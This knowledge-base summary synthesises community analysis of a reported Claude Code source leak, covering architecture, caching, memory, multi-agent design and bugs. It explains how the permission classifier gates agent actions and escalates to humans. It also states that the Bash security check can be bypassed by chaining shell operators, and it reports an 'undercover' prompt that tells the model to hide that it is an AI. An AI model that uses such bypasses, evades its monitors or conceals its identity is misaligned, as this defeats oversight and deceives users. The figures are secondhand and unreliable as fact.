The Architecture and Engineering of Claude Code Internals
- Source ID: src-20260420-37823422c4ac
- Kind: document
- Scope: shared
- Origin: claude_code/docs/summary.md
- Raw path: sources/raw/the-architecture-and-engineering-of-claude-code-internals__src-20260420-37823422c4ac.md
- Status: active
Tags
internal-docs architecture
Content
Summary of Key Concepts, Ideas, and Insights
Synthesized from 17 sources in the NotebookLM notebook covering the March 2026 Claude Code source leak.
1. The Leak: How It Happened
- A missing .npmignore entry shipped a 59.8 MB source map (cli.js.map) containing 512,000+ lines of unobfuscated TypeScript across ~1,900 files in npm package @anthropic-ai/claude-code v2.1.88.
- Bun generates source maps by default; no one in the build pipeline excluded the output.
- Anthropic leadership had stated that ~90-100% of Claude Code was written by Claude itself. The "AI whistleblower" thesis emerged: the AI wrote its own code, configured its own build pipeline, and leaked its own source.
- Within hours the code was mirrored, dissected, and clean-room rewritten. A Python/Rust rewrite (claw-code) hit 50,000 GitHub stars in 2 hours -- the fastest-growing repo in GitHub history.
2. Overall Architecture: A Platform Runtime, Not a Wrapper
Claude Code is described as "closer to VS Code's extension host or Emacs's Lisp core than to a typical AI wrapper."
Five-Layer Architecture
| Layer | Contents |
|---|---|
| 1 -- Entrypoints | CLI / Desktop / Web / SDK / IDE Extensions |
| 2 -- Runtime | REPL loop / Query executor / Hook system / State manager |
| 3 -- Engine | QueryEngine / Context coordinator / Model manager / Compact |
| 4 -- Tools & Capabilities | 100+ tools / Plugin / MCP / Skill / Agent / Command |
| 5 -- Infrastructure | Auth / Storage / Cache / Analytics / Bridge transport |
The Bridge layer abstracts transport so the same QueryEngine powers every surface (terminal, desktop, web, IDE extensions, SDK).
The Agent Loop: Async Generator, Not State Machine
Most agent frameworks use state machines or event emitters. Claude Code uses an async generator:
- Streaming is native -- tokens flow through yield, no callbacks.
- Interruption is clean -- standard AbortController cancels the generator.
- Budget control is trivial -- check maxBudget at each iteration boundary.
- Tool calls are tail-recursive -- tool_use -> tool_result -> continue is just another iteration.
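The loop shape described above can be sketched in a few lines. This is a minimal Python illustration, not the leaked TypeScript: `fake_model_turn`, the event dictionaries, and the one-unit-per-event cost are all assumptions made up for the example.

```python
import asyncio
from typing import AsyncIterator

# Hypothetical stand-in for a streaming model call; not a real API.
async def fake_model_turn(turn: int) -> AsyncIterator[dict]:
    yield {"type": "text", "text": f"thinking about step {turn}"}
    if turn < 2:
        # Request a tool on the first two turns, then finish.
        yield {"type": "tool_use", "name": "echo", "input": turn}

async def agent_loop(max_budget: int) -> AsyncIterator[dict]:
    """Yield events until the model stops calling tools or the budget runs out."""
    spent = 0
    turn = 0
    while True:
        # Budget is checked once, at the iteration boundary.
        if spent >= max_budget:
            yield {"type": "stop", "reason": "budget"}
            return
        tool_calls = []
        async for event in fake_model_turn(turn):
            spent += 1  # assumption: every event costs one budget unit
            if event["type"] == "tool_use":
                tool_calls.append(event)
            yield event  # streaming: events flow straight to the consumer
        if not tool_calls:
            yield {"type": "stop", "reason": "done"}
            return
        for call in tool_calls:
            # tool_use -> tool_result -> continue is just the next iteration.
            yield {"type": "tool_result", "name": call["name"], "output": call["input"]}
        turn += 1

async def collect(max_budget: int) -> list[dict]:
    return [event async for event in agent_loop(max_budget)]
```

With a generous budget the sketch runs three model turns and stops with reason "done"; with `max_budget=2` it stops at the second iteration boundary with reason "budget". In this Python rendering a consumer interrupts by simply ceasing to iterate or closing the generator, which plays the role the source attributes to AbortController.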
Split Query Engine
- QueryEngine.ts (~1,295 lines) -- Outer loop: agentic control, retries, budget enforcement (token counts + USD cost), permission checks, max turn limits.
- query.ts (~1,729 lines) -- Inner loop: system prompt assembly, message history, API streaming, hook execution, tool result collection.
The separation means the outer loop can abort on cost without the inner loop knowing about budgets.
3. System Prompt Architecture
Cache Boundary Design
The system prompt is split by a SYSTEM_PROMPT_DYNAMIC_BOUNDARY marker:
| Section | Cache Scope | TTL | Cost |
|---|---|---|---|
| Identity, rules, tool descriptions | Global (all users) | 1 hour | 10% on hit |
| CLAUDE.md, git status, memory | Per-session | 5 min | 10% on hit |
| Latest messages | Sliding window | 5 min | 10% on hit |
Real sessions achieve 96% cache hit rates. At Opus 4.6 pricing, a 100K-token uncached prompt costs $0.50; cached, $0.05.
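The arithmetic behind those figures can be checked directly. The sketch below assumes a price of $5 per million input tokens (implied by $0.50 for 100K tokens), treats the 96% hit rate as the share of prompt tokens served from cache, and ignores any cache-write surcharge; `prompt_cost` is a hypothetical helper name.

```python
def prompt_cost(tokens: int, price_per_mtok: float, hit_rate: float,
                hit_multiplier: float = 0.10) -> float:
    """Blended input cost in USD for a prompt with a given cache hit rate.

    Cached tokens are billed at hit_multiplier (10% per the table above);
    the remaining tokens are billed at full price.
    """
    base = tokens / 1_000_000 * price_per_mtok
    return base * (hit_rate * hit_multiplier + (1.0 - hit_rate))

uncached = prompt_cost(100_000, 5.0, hit_rate=0.0)   # full price
cached = prompt_cost(100_000, 5.0, hit_rate=1.0)     # every token hits
blended = prompt_cost(100_000, 5.0, hit_rate=0.96)   # the reported hit rate
```

Under these assumptions the three values come out at $0.50, $0.05, and roughly $0.068, so a 96% hit rate recovers most of the saving of a fully cached prompt.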
The 80/28 Breakdown
The codebase contains ~80 prompts, of which 28 are system prompts assembled into four injection categories.
Tool Pool Ordering
Built-in tools are sorted alphabetically and placed first as a stable cache prefix. MCP tools are sorted alphabetically and appended after. The two groups never interleave. This means adding/removing MCP servers never invalidates the expensive built-in prefix cache.
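A small sketch shows why this ordering keeps the prefix stable. The tool names and the `build_tool_pool` and `common_prefix_len` helpers are illustrative assumptions, not identifiers from the source.

```python
def build_tool_pool(builtin: list[str], mcp: list[str]) -> list[str]:
    """Sort each group on its own and keep built-ins first, never interleaved."""
    return sorted(builtin) + sorted(mcp)

def common_prefix_len(a: list[str], b: list[str]) -> int:
    """Number of leading entries two tool lists share (the cacheable prefix)."""
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n

builtin_tools = ["Grep", "Bash", "Read"]
before = build_tool_pool(builtin_tools, ["mcp__b__x"])
after = build_tool_pool(builtin_tools, ["mcp__a__y", "mcp__b__x"])
shared = common_prefix_len(before, after)
```

Adding an MCP tool changes only the tail of the list: `shared` stays equal to the number of built-in tools, so the serialized built-in block that a prefix cache would key on is unchanged.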
Tool Documentation Deduplication
An LLM side-query runs before each tool invocation to check if the tool's docs were already provided in recent turns. If so, the description is stripped to save context tokens.
Two-Tier Prompt: Internal vs. External
Anthropic internal engineers (USER_TYPE === 'ant') receive a materially different system prompt:
| Directive | External Customers | Internal Employees |
|---|---|---|
| Verbosity | "Short and concise" | "Err on the side of more explanation" |
| Verification | Absent | "Before reporting complete, verify it actually completed" |
| Collaboration | Absent | "You're a collaborator, not just an executor" |
Internal users also get access to a Verification Agent that double-checks work, addressing a known 29-30% false-claims rate in the current model.
Undercover Mode
When Anthropic employees work on public/open-source repos, a prompt injection instructs Claude to hide that it is an AI, scrub internal codenames, and omit Co-Authored-By attribution.
4. Tool System
40+ Built-in Tools
Key tools include BashTool, PowerShellTool, FileReadTool, FileEditTool, FileWriteTool, GlobTool, GrepTool, AgentTool, WebFetchTool, WebSearchTool, NotebookEditTool, SkillTool, TaskTools, and more.
- Each tool carries its own React renderer for co-located terminal UI (e.g., Bash's live stdout, FileEdit's diff view).
- GlobTool and GrepTool fall back to native OS binaries (bfs, ugrep) when available.
- Writes during speculative execution are redirected to an overlay filesystem to prevent side-effects before confirmation.
StreamingToolExecutor
- Begins executing tools as they arrive in the API stream, not after the full response completes.
- Tools marked isConcurrencySafe run in parallel; others get exclusive access.
- Results are emitted in request order (not completion order) for deterministic output.
- Large tool results are persisted to disk -- the conversation holds a file reference, not content.
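The parallel-versus-exclusive rule and request-order output can be sketched with asyncio. This is a simplified batch version under stated assumptions: it receives the full list of calls up front rather than consuming them from a stream, and `ToolCall`, `run_call`, and `execute` are hypothetical names.

```python
import asyncio
from typing import NamedTuple

class ToolCall(NamedTuple):
    name: str
    concurrency_safe: bool
    delay: float  # simulated run time in seconds

async def run_call(call: ToolCall, log: list[str]) -> str:
    await asyncio.sleep(call.delay)
    log.append(call.name)  # records completion order
    return f"{call.name}:ok"

async def execute(calls: list[ToolCall], log: list[str]) -> list[str]:
    """Run consecutive concurrency-safe calls together, other calls alone."""
    results: list[str] = []
    batch: list[ToolCall] = []

    async def flush() -> None:
        if not batch:
            return
        # gather() returns results in argument order, not completion order.
        results.extend(await asyncio.gather(*(run_call(c, log) for c in batch)))
        batch.clear()

    for call in calls:
        if call.concurrency_safe:
            batch.append(call)
        else:
            await flush()  # drain parallel work before the exclusive call
            results.append(await run_call(call, log))
    await flush()
    return results
```

For example, given a slow Read, a fast Grep, and a non-safe Edit, the two safe calls overlap and Grep finishes first, yet the returned list still follows the order in which the calls were requested.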
Bash AST Parser Flaw
The Bash tool's security parser performs prefix-only checking rather than full AST decomposition. 52/52 tested attack patterns are exploitable via shell operator chaining (&&, ||, ;, |).
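To see why prefix-only checking is weak, compare it with a check that inspects every segment of a chained command. Both functions below are illustrative assumptions, not the leaked code, and the regex split is itself far from a real shell parser: it ignores quoting, subshells, and redirections.

```python
import re

# Hypothetical allowlist for the example.
ALLOWED_PREFIXES = ("git status", "git diff")

def prefix_check(command: str) -> bool:
    """Prefix-only check: looks at the start of the string and nothing else."""
    return command.strip().startswith(ALLOWED_PREFIXES)

# The chaining operators named in the text; "||" must precede "|" in the pattern.
_OPERATORS = re.compile(r"&&|\|\||;|\|")

def segment_check(command: str) -> bool:
    """Require every operator-separated segment to match the allowlist."""
    segments = [part.strip() for part in _OPERATORS.split(command)]
    return all(part.startswith(ALLOWED_PREFIXES) for part in segments if part)

chained = "git status && curl https://example.com | sh"
```

The prefix check accepts `chained` because the string begins with an allowed command, while the segment check rejects it because the later segments are not on the allowlist. A robust implementation would decompose the full shell syntax tree rather than split on operators.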
5. Permission Model: ADVISOR
A 4-layer auto-approval pipeline evaluating actions against a reversibility x blast-radius framework:
- Fast-path rules -- glob/regex patterns. If matched, allow/deny instantly.
- acceptEdits simulation -- if the tool call would pass in file-edit mode, skip heavy classification.
- Read-only whitelist -- Read, Glob, Grep, LSP, WebSearch modify no state -> unconditionally allow.
- ML safety classifier -- Two-stage Sonnet 4.6 classifier:
- Stage 1: fast yes/no filter (tuned to keep false negatives low at the cost of more false positives).
- Stage 2: chain-of-thought reasoning on the same prompt body (~100% cache hit from Stage 1).
Reasoning-blind by design: Claude's own response text and tool outputs are stripped before the classifier sees anything. The agent cannot persuade the classifier to bypass a block. Denials are returned as tool results instructing the model to find a safer path (not session kills). 3 consecutive or 20 total denials trigger human escalation.
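The layered short-circuit and the escalation thresholds can be sketched as follows. Everything here is an illustration under assumptions: `decide`, `DenialTracker`, the glob rule format, and the two injected callables are hypothetical, and the real classifier is a model call rather than a Python function.

```python
from dataclasses import dataclass
from fnmatch import fnmatch
from typing import Callable

READ_ONLY_TOOLS = {"Read", "Glob", "Grep", "LSP", "WebSearch"}

def decide(tool: str, target: str,
           fast_rules: list[tuple[str, str]],
           passes_accept_edits: Callable[[str, str], bool],
           classify: Callable[[str, str], str]) -> str:
    """Return "allow" or "deny", stopping at the first layer that decides."""
    for pattern, verdict in fast_rules:       # layer 1: fast-path rules
        if fnmatch(target, pattern):
            return verdict
    if passes_accept_edits(tool, target):     # layer 2: acceptEdits simulation
        return "allow"
    if tool in READ_ONLY_TOOLS:               # layer 3: read-only whitelist
        return "allow"
    return classify(tool, target)             # layer 4: classifier (stubbed)

@dataclass
class DenialTracker:
    max_consecutive: int = 3
    max_total: int = 20
    consecutive: int = 0
    total: int = 0

    def record(self, allowed: bool) -> bool:
        """Record a decision; return True when a human should be asked."""
        if allowed:
            self.consecutive = 0
            return False
        self.consecutive += 1
        self.total += 1
        return (self.consecutive >= self.max_consecutive
                or self.total >= self.max_total)
```

A caller would feed each `decide` result into `DenialTracker.record` and escalate to the user when it returns True, which happens on the third denial in a row or the twentieth overall.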
6. Context Compression: Four Tiers of Managed Degradation
| Tier | Mechanism | When |
|---|---|---|
| 1 | autoCompact | Context approaching limit (13K buffer) |
| 2 | apiMicrocompact | API-native |
| 3 | reactiveCompact | After API returns HTTP 413 (prompt too long) |
| 4 | snip | Emergency: discard non-critical content |
- compact() strips images, summarizes conversation, restores file references and skill state.
- After compression, preservedSegment boundaries allow selective recovery.
- Selective preservation is supported, e.g. "/compact keep the database schema".
- Circuit breaker: max 3 consecutive compaction failures before disabling for the session.
- reactiveCompact withholds the 413 error from the user until all recovery paths are exhausted.
Known Bug: 250,000 Wasted API Calls/Day
Before the fix, 1,279 sessions had 50+ consecutive compaction failures (up to 3,272 per session), wasting ~250K API calls/day globally. Fix: MAX_CONSECUTIVE_AUTOCOMPACT_FAILURES = 3.
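A circuit breaker of this kind is only a few lines. The constant name comes from the text above; the `CompactionBreaker` class and its methods are a hypothetical sketch, not the actual fix.

```python
from typing import Callable

MAX_CONSECUTIVE_AUTOCOMPACT_FAILURES = 3

class CompactionBreaker:
    """Stop retrying compaction after too many failures in a row."""

    def __init__(self, limit: int = MAX_CONSECUTIVE_AUTOCOMPACT_FAILURES) -> None:
        self.limit = limit
        self.failures = 0

    @property
    def tripped(self) -> bool:
        return self.failures >= self.limit

    def attempt(self, compact: Callable[[], None]) -> bool:
        """Run compact() unless the breaker has tripped; report success."""
        if self.tripped:
            return False  # disabled for the rest of the session
        try:
            compact()
        except Exception:
            self.failures += 1
            return False
        self.failures = 0  # any success resets the streak
        return True
```

With the breaker in place, a session whose compaction always fails issues at most three compaction calls instead of the thousands reported before the fix.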
7. CLAUDE.md System
- Loaded into the system prompt on every single conversational turn, not just at session start. Supports up to 40,000 characters.
- Load order (most general to most specific): ~/.claude/CLAUDE.md -> User -> Project -> Local -> Subdirectory. The most specific file gets highest model attention (last-loaded-wins).
- Structurally subordinated to the core system prompt via a preamble: "this context may or may not be relevant." If CLAUDE.md conflicts with the system prompt, the system prompt wins.
- Cost optimization: 4-5 small conditional rule files (~200 tokens each, path-scoped) outperform one monolithic 11,000-token file. Rule compliance improves from 92% to 96%.
- Silent bug: paths: frontmatter (documented format) fails silently; must use globs: instead.
8. Auto-Memory: Claude Writing Its Own Notes
- Background extraction where Claude reads its own conversation and writes structured notes to ~/.claude/projects/<project>/memory/.
- Trigger cadence: First extraction at ~10,000 tokens; updates every ~5,000 tokens or every 3 tool calls.
- No embeddings: Deliberately rejects vector search. Claude calls ls() on the memory directory, reasons about filenames, and selectively reads files. Design philosophy: "choose regex over embeddings for search, Markdown files over databases for memory."
- Two-layer index: MEMORY.md (first 200 lines always loaded) points to on-demand topic files.
- Four semantic types: User (who they are), Feedback (how to behave), Project (what's happening), Reference (where to look).
9. Auto-Dream: Background Memory Consolidation
Inspired by the UC Berkeley "Sleep-time Compute" paper (arXiv:2504.13171). The system prompt literally reads: "You are performing a dream."
Four-Gate Trigger (cheapest checks first)
| Gate | Check | Cost |
|---|---|---|
| 1 | >= 24 hours since last consolidation | Trivial (timestamp) |
| 2 | >= 5 sessions accumulated | Low (scan file list) |
| 3 | >= 10 minutes since last scan | Trivial (timestamp) |
| 4 | Acquire filesystem lock | Medium (prevents concurrent dreams) |
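The gate ordering can be expressed as a chain of early returns, so the costlier checks run only when the cheaper ones pass. The thresholds come from the table; `should_dream` and its callable parameters are hypothetical, and times are plain Unix timestamps in seconds.

```python
from typing import Callable

DAY_SECONDS = 24 * 60 * 60
SCAN_THROTTLE_SECONDS = 10 * 60
MIN_SESSIONS = 5

def should_dream(now: float,
                 last_consolidation: float,
                 last_scan: float,
                 count_sessions: Callable[[], int],
                 acquire_lock: Callable[[], bool]) -> bool:
    """Evaluate the four gates in table order, stopping at the first failure."""
    if now - last_consolidation < DAY_SECONDS:    # gate 1: timestamp compare
        return False
    if count_sessions() < MIN_SESSIONS:           # gate 2: scan the file list
        return False
    if now - last_scan < SCAN_THROTTLE_SECONDS:   # gate 3: scan throttle
        return False
    return acquire_lock()                         # gate 4: filesystem lock
```

Passing the session count and the lock as callables keeps them lazy: if less than 24 hours have passed, neither the directory scan nor the lock attempt happens at all.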
Four Phases
- Orient: Survey memory directory, read index, skim topic headings.
- Gather Signal: Targeted grep of daily logs (never reads transcripts end-to-end). Targets user corrections, explicit saves, recurring themes, architectural decisions.
- Consolidate: Convert relative timestamps to absolute dates, delete contradicted facts, merge duplicates, resolve conflicts.
- Prune & Index: Rewrite topic files, rebuild MEMORY.md under 200-line cap, remove stale entries.
One documented test processed 913 accumulated sessions in ~8-9 minutes without blocking the active terminal.
10. Multi-Agent System
Three Execution Models (Plus Worktree Isolation and DreamTask)
| Model | Isolation | Use Case |
|---|---|---|
| InProcessTeammate | AsyncLocalStorage | Same terminal, lightweight |
| LocalAgentTask | Async background process | Non-blocking parallel sub-agent |
| RemoteAgentTask | Cloud container (CCR) | Full cloud-sandboxed execution |
| Worktree isolation | Git worktree (own branch/directory) | Parallel code editing without conflicts |
| DreamTask | Background-only | Memory consolidation |
Cache Inheritance
Subagents are spawned via a fork-join pattern inheriting the parent's CacheSafeParams. They produce byte-identical API request prefixes, achieving up to 92% prompt-cache reuse across the swarm. Spawning 5 parallel agents costs nearly the same as spawning 1.
Atomic Task Claiming
File-locking in a current_tasks/ directory prevents race conditions without a central coordinator. Anti-recursion: <fork_boilerplate_tag> marker prevents recursive forking.
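One common way to get coordinator-free claiming is exclusive file creation, sketched below. The source only says that file locking in current_tasks/ is used; the `.lock` naming, the `claim_task` helper, and the choice of `O_CREAT | O_EXCL` are assumptions for illustration.

```python
import os
from pathlib import Path

def claim_task(tasks_dir: Path, task_id: str, agent_id: str) -> bool:
    """Try to claim a task; exactly one caller per task_id gets True."""
    tasks_dir.mkdir(parents=True, exist_ok=True)
    lock_path = tasks_dir / f"{task_id}.lock"
    try:
        # O_CREAT | O_EXCL makes creation fail if the file already exists,
        # so the existence check and the creation are a single atomic step.
        fd = os.open(lock_path, os.O_CREAT | os.O_EXCL | os.O_WRONLY)
    except FileExistsError:
        return False  # another agent claimed it first
    with os.fdopen(fd, "w") as handle:
        handle.write(agent_id)  # record the owner for debugging
    return True
```

Because the filesystem arbitrates the race, agents need no shared process or message bus: each one calls `claim_task` and simply moves on to another task when it returns False.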
omitClaudeMd Optimization
Read-only agents (explore, plan) are spawned with omitClaudeMd: true, saving 5-15 GTok/week internally.
11. Speculative Execution Engine
A completely dark feature (behind tengu_speculation in GrowthBook):
- When Claude finishes responding and generates a suggestion, it silently forks a background API call and begins executing the predicted prompt immediately.
- Execution runs in an overlay filesystem -- writes copy originals to overlay first; the real codebase is never modified.
- If accepted: overlay files copy back, speculated messages inject into conversation.
- If rejected: overlay is destroyed, API call aborted.
- Recursive pipelining: successful speculation immediately predicts and starts executing the next suggestion (isPipelined = true).
Permission tiers: Read/Glob/Grep run freely; Edit/Write redirect to overlay; Bash only if already auto-approved; everything else denied.
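The accept-or-discard behaviour of the overlay can be sketched with two directories. This is a simplified illustration: the `Overlay` class is hypothetical, it handles whole-file text writes only, and it writes new content straight into the overlay rather than first copying the original as the text describes.

```python
import shutil
from pathlib import Path

class Overlay:
    """Redirect writes to a scratch directory until they are accepted."""

    def __init__(self, root: Path, overlay: Path) -> None:
        self.root = root
        self.overlay = overlay
        self.touched: set[str] = set()  # relative paths written so far

    def write(self, rel: str, text: str) -> None:
        target = self.overlay / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(text, encoding="utf-8")  # real tree is untouched
        self.touched.add(rel)

    def read(self, rel: str) -> str:
        shadow = self.overlay / rel
        source = shadow if shadow.exists() else self.root / rel
        return source.read_text(encoding="utf-8")

    def accept(self) -> None:
        """Copy speculated files into the real tree, then drop the overlay."""
        for rel in self.touched:
            dest = self.root / rel
            dest.parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(self.overlay / rel, dest)
        self.discard()

    def discard(self) -> None:
        """Throw the speculation away; the real tree was never modified."""
        shutil.rmtree(self.overlay, ignore_errors=True)
        self.touched.clear()
```

Reads prefer the overlay copy so speculated work sees its own edits, while anything outside the overlay keeps seeing the original files until `accept` runs.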
12. KAIROS: The Always-On Daemon (Unreleased)
Named after the Greek concept of "opportune timing" (vs. chronos/sequential time).
- Transforms Claude Code from reactive to proactive.
- Maintains append-only daily logs at ~/.claude/projects/<slug>/memory/logs/YYYY/MM/YYYY-MM-DD.md.
- Receives periodic <tick> heartbeat prompts to decide whether to act or stay quiet.
- Enforces a 15-second blocking budget -- anything longer is deferred.
- Outputs via Brief Mode (concise, structured messages).
- Has three exclusive tools: SendUserFile, PushNotification, SubscribePR.
- Gated behind two compile-time flags (PROACTIVE and KAIROS) and eliminated from external builds.
Community reaction: "KAIROS is Claude as a hyper-agentic OpenClaw. Always-on. Proactive. Responsive."
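The daily log layout listed above maps directly onto a path-building helper. The directory pattern is taken from the text; `daily_log_path` and `append_log` are hypothetical names, and the home directory is passed in explicitly so the sketch does not touch a real ~/.claude folder.

```python
from datetime import date
from pathlib import Path

def daily_log_path(home: Path, slug: str, day: date) -> Path:
    """Build <home>/.claude/projects/<slug>/memory/logs/YYYY/MM/YYYY-MM-DD.md."""
    return (home / ".claude" / "projects" / slug / "memory" / "logs"
            / f"{day:%Y}" / f"{day:%m}" / f"{day:%Y-%m-%d}.md")

def append_log(path: Path, line: str) -> None:
    """Append one entry; existing content is never rewritten."""
    path.parent.mkdir(parents=True, exist_ok=True)
    with path.open("a", encoding="utf-8") as handle:
        handle.write(line.rstrip("\n") + "\n")
```

Opening the file in append mode is what makes the log append-only from the writer's side; consolidation into topic files is left to the separate dream pass described in section 9.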
13. Anti-Distillation System (Three Layers)
Responding to documented industrial-scale distillation campaigns by DeepSeek, Moonshot AI, and MiniMax (16M exchanges via ~24,000 fraudulent accounts):
Layer 1: Fake Tool Injection
- When active, sends anti_distillation: ['fake_tools'] in API requests.
- Server silently injects decoy tool definitions. Claude was trained to recognize and ignore fakes; a competitor's model trained on scraped traffic would learn to call tools that don't exist.
Layer 2: Connector-Text Summarization (Chain-of-Thought Hiding)
- Server buffers Claude's reasoning between tool calls, replaces it with cryptographically signed summaries.
- Even a full MITM attacker never sees the original chain-of-thought. This is the "real" anti-distillation defense.
Layer 3: (Soft deterrent via the fake tools above)
14. Known Bugs and Engineering Issues
Cache-Destroying Bugs
- "Don't Talk About Billing" Bug: The Zig HTTP layer searches request bodies for cch=00000 and replaces it with an attestation hash. If your conversation contains this string (discussing billing, source code), it corrupts message content, invalidating the cache. The result is a 10-20x cost increase with no visible symptom.
- --resume Tax: Using resume causes a complete cache miss for all conversation history. Only the system prompt is cached.
File Descriptor Leak
- Each tool invocation opens ~/.claude/settings.json and never closes it. One session accumulated 49,900 open handles, crashing the host OS.
Zero-Test Culture
- Shipping without tests was a deliberate choice in a fast-moving product, but it resulted in structural bugs around concurrency and shared mutable state.
Frustration Detection via Regex
- A basic regex (/\b(wtf|shit|fuck|horrible|awful|terrible)\b/i) detects user frustration -- not an LLM. Community reaction: "An AI company using regex for sentiment analysis. It's like a trucking company using horses to transport spare parts."
15. Four Generalizable Engineering Patterns
Identified by community analysis as extractable for any agent framework:
- System prompt engineering with tool constraints: Describe tool risk levels, reversibility checks, and output format specs directly in the prompt. Claude Code's Bash tool description is 1,558 tokens specifically for this.
- Multi-agent atomic task claiming: File-lock-based claiming with typed task IDs prevents duplicate work without a central coordinator.
- Staged context compression: Multiple mechanisms at different trigger thresholds (four tiers in Claude Code, per section 6) prevent both premature summarization and catastrophic context loss.
- Dream-based memory consolidation: Append-only logs during sessions + periodic consolidation subagent. Never re-read transcripts end-to-end; always grep for specific patterns.
16. Easter Eggs
- BUDDY: A full Tamagotchi-style pet companion system with deterministic gacha, species rarity, shiny variants, procedurally generated stats, and a soul description written by Claude on first hatch. Species names are hex-encoded to evade internal leak detectors.
- 187 Spinner Verbs: Including "boondoggling," "discombobulating," "fibridding," and "moonwalking." Extensible via settings.json. This spread fastest on developer social media.
- "Penguins all the way down": Internal codenames throughout (penguinModeOrgEnabled, tengu_penguins_off, tengu_org_penguin_mode_fetch_failed).
17. Community Impact
- Clean-room rewrites launched immediately to evade DMCA (legal argument: AI-assisted rebuild of AI-generated code can't be DMCA'd).
- The OpenClaw open-source community saw KAIROS as massive validation of their always-on agent thesis.
- Security researchers documented the Bash AST parser flaw and file descriptor leaks.
- The "AI whistleblower" narrative dominated: Claude wrote its own code, configured its own build, and leaked its own source.
- Decentralized IPFS mirrors with all telemetry stripped and experimental flags unlocked were posted as permanent archives.